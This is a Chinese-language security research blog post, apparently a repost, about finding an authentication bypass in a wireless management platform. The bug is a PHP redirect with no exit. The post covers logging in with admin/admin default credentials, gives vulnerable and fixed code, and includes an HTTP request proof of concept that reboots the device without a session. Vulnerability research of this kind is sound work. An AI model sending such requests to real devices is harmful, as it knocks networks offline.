点击「蓝色」字体关注我们!
用鹰图语法找了波网络设备的相关词汇
然后找到了个智能无线管理平台
通过祖传弱口令admin admin进入
之后就是测试相应功能点,最终没有找到有SQL注入的参数和RCE的地方
不过这里确定归属是来到系统管理
是这家公司开发的
对证书再见吧,不够5000万
在无限重复黑盒测试抓包测功能点的过程中,来到功能池
随便调节一下,点击应用,Burp进行抓包
该逻辑漏洞在于我删除Cookie后,如上图是有Cookie时应用后正常success表示应用成功
删除Cookie后,发现正常执行相应功能并回显success(虽然代码鉴权到了,并跳转index.php用户认证处,但没有阻止代码继续往下跑)
造成这个漏洞成因可以模拟出相应白盒代码:
if(!isset($_COOKIE['PHPSESSID'])) {header("Location: index.php");}// 后续的代码继续执行echo"Welcome to the success page!";// 虽然跳转到index.php,但是echo也会继续执行
修复代码如下:
if(!isset($_COOKIE['PHPSESSID'])) {header("Location: index.php");exit;//增加exit修复继续执行}// 后续的代码继续执行echo"Welcome to the success page!";// 虽然跳转到index.php,但是echo也会继续执行
利用该逻辑漏洞,找到个设备重启功能和恢复出厂商功能,从而变成影响很大的前台拒绝服务漏洞
拒绝服务POC如下:
POST/ac_reboot.php?action=submitHTTP/1.1Host: ***********User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------27648818302819120642279485210Content-Length: 62Origin: http://***************Connection: closeReferer: http://***********:**/ac_reboot.phpUpgrade-Insecure-Requests: 1-----------------------------27648818302819120642279485210--
总结:
挖漏洞要细心,并思考漏洞的成因
原文始发于微信公众号(PwnPigPig):cnvd通用型漏洞挖掘思路-从逻辑漏洞到拒绝服务漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论